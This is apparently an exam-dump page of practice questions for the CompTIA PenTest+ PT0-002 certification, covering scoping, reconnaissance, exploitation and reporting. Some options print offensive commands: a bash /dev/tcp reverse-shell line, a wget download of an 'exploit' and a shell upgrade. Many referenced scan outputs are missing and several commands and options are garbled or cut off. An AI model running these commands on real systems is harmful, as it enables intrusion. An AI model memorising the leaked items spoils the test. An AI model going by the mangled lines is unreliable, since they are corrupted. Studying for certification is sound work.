Online PT0-002 Dumps Help You Understand Questions Well

Category:

Comments:

0 Comments

Post Date:

April 17, 2023

If you're interested in pursuing the PenTest+ certification, it's important to understand the exam format and the types of questions you can expect. This is where PT0-002 questions come in. PT0-002 exam dumps questions are designed to simulate the actual certification exam, providing you with a deeper understanding of the exam format and what to expect on test day. By taking practice exams and reviewing PT0-002 questions, you can identify areas where you may need to focus your studying. Study free PT0-002 exam dumps below.

Page 1 of 9

1. A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building.

Which of the following techniques would be BEST to use to gain confidential information?

Badge cloning

Dumpster diving

Tailgating

Shoulder surfing

2. A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

Utilize the tunnel as a means of pivoting to other internal devices.

Disregard the IP range, as it is out of scope.

Stop the assessment and inform the emergency contact.

Scan the IP range for additional systems to exploit.

3. A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

Telnet

HTTP

SMTP

DNS

NTP

SNMP

4. A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.

Which of the following describes the scope of the assessment?

Partially known environment testing

Known environment testing

Unknown environment testing

Physical environment testing

5. A penetration tester uncovers access keys within an organization's source code management solution.

Which of the following would BEST address the issue? (Choose two.)

Setting up a secret management solution for all items in the source code management system

Implementing role-based access control on the source code management system

Configuring multifactor authentication on the source code management system

Leveraging a solution to scan for other similar instances in the source code management system

Developing a secure software development life cycle process for committing code to the source code management system

Creating a trigger that will prevent developers from including passwords in the source code management system

6. Deconfliction is necessary when the penetration test:

determines that proprietary information is being stored in cleartext.

occurs during the monthly vulnerability scanning.

uncovers indicators of prior compromise over the course of the assessment.

proceeds in parallel with a criminal digital forensic investigation.

7. A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks.

Which of the following is the BEST method available to pivot and gain additional access to the network?

Set up a captive portal with embedded malicious code.

Capture handshakes from wireless clients to crack.

Span deauthentication packets to the wireless clients.

Set up another access point and perform an evil twin attack.

8. A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

nmap CoG list.txt 192.168.0.1-254, sort

nmap Csn 192.168.0.1-254, grep “Nmap scan” | awk ‘{print S5}’

nmap C-open 192.168.0.1-254, uniq

nmap Co 192.168.0.1-254, cut Cf 2

9. A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments.

Which of the following techniques should the tester select to accomplish this task?

Steganography

Metadata removal

Encryption

Encode64

10. A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system.

After running a few commands, the tester runs the following:

python -c 'import pty; pty.spawn("/bin/bash")'

Which of the following actions Is the penetration tester performing?

Privilege escalation

Upgrading the shell

Writing a script for persistence

Building a bind shell

Page 2 of 9

11. Penetration tester has discovered an unknown Linux 64-bit executable binary.

Which of the following tools would be BEST to use to analyze this issue?

Peach

WinDbg

GDB

OllyDbg

12. A penetration tester has extracted password hashes from the lsass.exe memory process.

Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

Use Patator to pass the hash and Responder for persistence.

Use Hashcat to pass the hash and Empire for persistence.

Use a bind shell to pass the hash and WMI for persistence.

Use Mimikatz to pass the hash and PsExec for persistence.

13. The results of an Nmap scan are as follows:

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST

Nmap scan report for ( 10.2.1.22 )

Host is up (0.0102s latency).

Not shown: 998 filtered ports

Port State Service

80/tcp open http

|_http-title: 80F 22% RH 1009.1MB (text/html)

|_http-slowloris-check:

| VULNERABLE:

| Slowloris DoS Attack

| <..>

Device type: bridge|general purpose

Running (JUST GUESSING) : QEMU (95%)

OS CPE: cpe:/a:qemu:qemu

No exact OS matches found for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds

Which of the following device types will MOST likely have a similar response? (Choose two.)

Network device

Public-facing web server

Active Directory domain controller

IoT/embedded device

Exposed RDP

Print queue

14. A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

Perform forensic analysis to isolate the means of compromise and determine attribution.

Incorporate the newly identified method of compromise into the red team’s approach.

Create a detailed document of findings before continuing with the assessment.

Halt the assessment and follow the reporting procedures as outlined in the contract.

15. A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers.

When engaging with a penetration-testing company to test the application, which of the following should the company avoid?

Crawling the web application's URLs looking for vulnerabilities

Fingerprinting all the IP addresses of the application's servers

Brute forcing the application's passwords

Sending many web requests per second to test DDoS protection

16. A penetration tester is testing a new API for the company's existing services and is preparing the following script:

Which of the following would the test discover?

Default web configurations

Open web ports on a host

Supported HTTP methods

Listening web servers in a domain

17. A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary.

Which of the following vulnerabilities is the security consultant MOST likely to identify?

Weak authentication schemes

Credentials stored in strings

Buffer overflows

Non-optimized resource management

18. A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site.

Which of the following recommendations would BEST address this situation?

Implement a recurring cybersecurity awareness education program for all users.

Implement multifactor authentication on all corporate applications.

Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.

Implement an email security gateway to block spam and malware from email communications.

19. A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.

Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

PLCs will not act upon commands injected over the network.

Supervisors and controllers are on a separate virtual network by default.

Controllers will not validate the origin of commands.

Supervisory systems will detect a malicious injection of code/commands.

20. A company becomes concerned when the security alarms are triggered during a penetration test.

Which of the following should the company do NEXT?

Halt the penetration test.

Contact law enforcement.

Deconflict with the penetration tester.

Assume the alert is from the penetration test.

Page 3 of 9

21. During an engagement, a penetration tester found the following list of strings inside a file:

Which of the following is the BEST technique to determine the known plaintext of the strings?

Dictionary attack

Rainbow table attack

Brute-force attack

Credential-stuffing attack

22. A penetration tester gains access to a system and is able to migrate to a user process:

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

Redirecting output from a file to a remote system

Building a scheduled task for execution

Mapping a share to a remote system

Executing a file on the remote system

Creating a new process on all domain systems

Setting up a reverse shell from a remote system

Adding an additional IP address on the compromised system

23. A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host.

Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

tcpdump

Snort

Nmap

Netstat

Fuzzer

24. A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR."

Which of the following attacks is being attempted?

SQL injection

HTML injection

Remote command injection

DLL injection

25. A penetration tester was able to compromise a server and escalate privileges.

Which of the following should the tester perform AFTER concluding the activities on the specified target? (Choose two.)

Remove the logs from the server.

Restore the server backup.

Disable the running services.

Remove any tools or scripts that were installed.

Delete any created credentials.

Reboot the target server.

26. A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue.

Which of the following BEST describes this attack?

Credential harvesting

Privilege escalation

Password spraying

Domain record abuse

27. A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours.

Which of the following are MOST important for the penetration tester to have during the test? (Choose two.)

A handheld RF spectrum analyzer

A mask and personal protective equipment

Caution tape for marking off insecure areas

A dedicated point of contact at the client

The paperwork documenting the engagement

Knowledge of the building's normal business hours

28. Which of the following would a company's hunt team be MOST interested in seeing in a final report?

Executive summary

Attack TTPs

Methodology

Scope details

29. A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results.

Which of the following would MOST likely accomplish this goal?

Using OpenVAS in default mode

Using Nessus with credentials

Using Nmap as the root user

Using OWASP ZAP

30. Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?

The team exploits a critical server within the organization.

The team exfiltrates PII or credit card data from the organization.

The team loses access to the network remotely.

The team discovers another actor on a system on the network.

Page 4 of 9

31. A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor.

Which of the following should the penetration tester do NEXT?

Forensically acquire the backdoor Trojan and perform attribution

Utilize the backdoor in support of the engagement

Continue the engagement and include the backdoor finding in the final report

Inform the customer immediately about the backdoor

32. A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company’s web presence.

Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

IP addresses and subdomains

Zone transfers

DNS forward and reverse lookups

Internet search engines

Externally facing open ports

Shodan results

33. A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.

Which of the following was captured by the testing team?

Multiple handshakes

IP addresses

Encrypted file transfers

User hashes sent over SMB

34. Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?

Dictionary

Directory

Symlink

Catalog

For-loop

35. CORRECT TEXT

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

36. A penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet.

Which of the following OSs would MOST likely return a packet of this type?

Windows

Apple

Linux

Android

37. A penetration tester needs to upload the results of a port scan to a centralized security tool.

Which of the following commands would allow the tester to save the results in an interchangeable format?

nmap -iL results 192.168.0.10-100

nmap 192.168.0.10-100 -O > results

nmap -A 192.168.0.10-100 -oX results

nmap 192.168.0.10-100 | grep "results"

38. A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras.

Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

Pick a lock.

Disable the cameras remotely.

Impersonate a package delivery worker.

Send a phishing email.

39. A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity.

Which of the following is the MOST important action to take before starting this type of assessment?

Ensure the client has signed the SO

Verify the client has granted network access to the hot site.

Determine if the failover environment relies on resources not owned by the client.

Establish communication and escalation procedures with the client.

40. Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

NDA

MSA

SOW

MOU

Page 5 of 9

41. During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

NDA

42. Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

Whether the cloud service provider allows the penetration tester to test the environment

Whether the specific cloud services are being used by the application

The geographical location where the cloud services are running

Whether the country where the cloud service is based has any impeding laws

43. A company requires that all hypervisors have the latest available patches installed.

Which of the following would BEST explain the reason why this policy is in place?

To provide protection against host OS vulnerabilities

To reduce the probability of a VM escape attack

To fix any misconfigurations of the hypervisor

To enable all features of the hypervisor

44. A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

Nessus

ProxyChains

OWASPZAP

Empire

45. A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours.

Which of the following BEST describes why this would be necessary?

To meet PCI DSS testing requirements

For testing of the customer's SLA with the ISP

Because of concerns regarding bandwidth limitations

To ensure someone is available if something goes wrong

46. A penetration tester runs the following command on a system:

find / -user root Cperm -4000 Cprint 2>/dev/null

Which of the following is the tester trying to accomplish?

Set the SGID on all files in the / directory

Find the /root directory on the system

Find files with the SUID bit set

Find files that were created during exploitation and move them to /dev/null

47. A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers.

Which of the following is MOST likely causing the TCP resets to occur during the assessment?

The web server is using a WA

The web server is behind a load balancer.

The web server is redirecting the requests.

The local antivirus on the web server Is rejecting the connection.

48. A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks.

To avoid disrupting this user’s work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?

Add a web shell to the root of the website.

Upgrade the reverse shell to a true TTY terminal.

Add a new user with ID 0 to the /etc/passwd file.

Change the password of the root user and revert after the test.

49. A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment.

Which of the following would be the BEST option to identify a system properly prior to performing the assessment?

Asset inventory

DNS records

Web-application scan

Full scan

50. Given the following script:

Which of the following BEST characterizes the function performed by lines 5 and 6?

Retrieves the start-of-authority information for the zone on DNS server 10.10.10.10

Performs a single DNS query for www.comptia.org and prints the raw data output

Loops through variable b to count the results returned for the DNS query and prints that count to screen

Prints each DNS query result already stored in variable b

Page 6 of 9

51. In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: .

Which of the following would be the best action for the tester to take NEXT with this information?

Create a custom password dictionary as preparation for password spray testing.

Recommend using a password manage/vault instead of text files to store passwords securely.

Recommend configuring password complexity rules in all the systems and applications.

Document the unprotected file repository as a finding in the penetration-testing report.

52. A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

Decode the authorization header using UTF-8.

Decrypt the authorization header using bcrypt.

Decode the authorization header using Base64.

Decrypt the authorization header using AE

53. A penetration tester ran the following command on a staging server:

python Cm SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

nc 10.10.51.50 9891 < exploit

powershell Cexec bypass Cf \10.10.51.509891

bash Ci >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

wget 10.10.51.50:9891/exploit

54. A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client.

Which of the following happens NEXT?

The penetration tester conducts a retest.

The penetration tester deletes all scripts from the client machines.

The client applies patches to the systems.

The client clears system logs generated during the test.

55. A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines.

Which of the following documents could hold the penetration tester accountable for this action?

ROE

SLA

MSA

NDA

56. Which of the following is the MOST effective person to validate results from a penetration test?

Third party

Team leader

Chief Information Officer

Client

57. Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

HTTPS communication

Public and private keys

Password encryption

Sessions and cookies

58. The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted.

Which of the following BEST identifies this concept?

Statement of work

Program scope

Non-disclosure agreement

Rules of engagement

59. A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address.

Which of the following BEST describes what happened?

The penetration tester was testing the wrong assets

The planning process failed to ensure all teams were notified

The client was not ready for the assessment to start

The penetration tester had incorrect contact information

60. CORRECT TEXT

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

Page 7 of 9

61. A penetration tester receives the following results from an Nmap scan:

Which of the following OSs is the target MOST likely running?

CentOS

Arch Linux

Windows Server

Ubuntu

62. Appending string values onto another string is called:

compilation

connection

concatenation

conjunction

63. Which of the following tools provides Python classes for interacting with network protocols?

Responder

Impacket

Empire

PowerSploit

64. A compliance-based penetration test is primarily concerned with:

obtaining Pll from the protected network.

bypassing protection on edge devices.

determining the efficacy of a specific set of security standards.

obtaining specific information from the protected network.

65. A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data.

Which of the following should the tester do with this information to make this a successful exploit?

Perform XS

Conduct a watering-hole attack.

Use BeE

Use browser autopwn.

66. A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.

Which of the following would BEST support this task?

Run nmap with the Co, -p22, and CsC options set against the target

Run nmap with the CsV and Cp22 options set against the target

Run nmap with the --script vulners option set against the target

Run nmap with the CsA option set against the target

67. A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code.

Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

Immunity Debugger

OllyDbg

GDB

Drozer

68. A company has hired a penetration tester to deploy and set up a rogue access point on the network.

Which of the following is the BEST tool to use to accomplish this goal?

Wireshark

Aircrack-ng

Kismet

Wifite

69. A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine.

Which of the following MOST likely caused the attack to fail?

The injection was too slow.

The DNS information was incorrect.

The DNS cache was not refreshed.

The client did not receive a trusted response.

70. A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.

Which of the following Nmap scan syntaxes would BEST accomplish this objective?

nmap -sT -vvv -O 192.168.1.2/24 -PO

nmap -sV 192.168.1.2/24 -PO

nmap -sA -v -O 192.168.1.2/24

nmap -sS -O 192.168.1.2/24 -T1

Page 8 of 9

71. After running the enum4linux.pl command, a penetration tester received the following output:

Which of the following commands should the penetration tester run NEXT?

smbspool //192.160.100.56/print$

net rpc share -S 192.168.100.56 -U ''

smbget //192.168.100.56/web -U ''

smbclient //192.168.100.56/web -U '' -N

72. Given the following code:

Which of the following data structures is systems?

A tuple

A tree

An array

A dictionary

73. DRAG DROP

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

74. An Nmap network scan has found five open ports with identified services.

Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

OpenVAS

Drozer

Burp Suite

OWASP ZAP

75. A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.

Which of the following should the tester do NEXT?

Reach out to the primary point of contact

Try to take down the attackers

Call law enforcement officials immediately

Collect the proper evidence and add to the final report

76. A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high.

Which of the following should be the NEXT step?

Perform a new penetration test.

Remediate the findings.

Provide the list of common vulnerabilities and exposures.

Broaden the scope of the penetration test.

77. A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011.

Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

Nmap

tcpdump

Scapy

hping3

78. A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet.

Which of the following is the BEST action for the tester to take?

Check the scoping document to determine if exfiltration is within scope.

Stop the penetration test.

Escalate the issue.

Include the discovery and interaction in the daily report.

79. A penetration tester is testing input validation on a search form that was discovered on a website.

Which of the following characters is the BEST option to test the website for vulnerabilities?

Comma

Double dash

Single quote

Semicolon

80. A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.

Which of the following tools or techniques would BEST support additional reconnaissance?

Wardriving

Shodan

Recon-ng

Aircrack-ng

Page 9 of 9

81. A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

Delete the scheduled batch job.

Close the reverse shell connection.

Downgrade the svsaccount permissions.

Remove the tester-created credentials.

82. Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Executive summary of the penetration-testing methods used

Bill of materials including supplies, subcontracts, and costs incurred during assessment

Quantitative impact assessments given a successful software compromise

Code context for instances of unsafe type-casting operations

83. A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM.

Which of the following cloud attacks did the penetration tester MOST likely implement?

Direct-to-origin

Cross-site scripting

Malware injection

Credential harvesting

84. During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign.

Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)

Scraping social media sites

Using the WHOIS lookup tool

Crawling the client’s website

Phishing company employees

Utilizing DNS lookup tools

Conducting wardriving near the client facility

85. A penetration tester is reviewing the following SOW prior to engaging with a client:

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection

Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team

Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address

Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop

Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements

TAGS:

PT0-002, PT0-002 exam dumps

Notify of

Label

Name*

Email*

Website

Label

Name*

Email*

Website

0 Comments

Oldest

Newest Most Voted

Inline Feedbacks

View all comments

Posts

CompTIA Free Dumps

Get PT0-002 Dumps Full Version

Q&As: 391
Versions: PDF and Software Download Now

About Dumpsinfo

Dumpsinfo is a good platform providing the latest exam information and dumps questions for all IT certification exams. You can study all the latest exam dumps questions online.

[email protected]

Mon - Sat 9:00am - 6:00pm

Online PT0-002 Dumps Help You Understand Questions Well

Related

Posts

Online XK0-005 Exam Dumps Help You Build Confidence

SY0-701 Dumps Questions – Effective Way to Get Certified

DS0-001 Dumps Questions Increase Your Chance of Success

Get Certified Easily with Online DA0-001 Dumps

About Us

EMAIL

Services

Opening Hours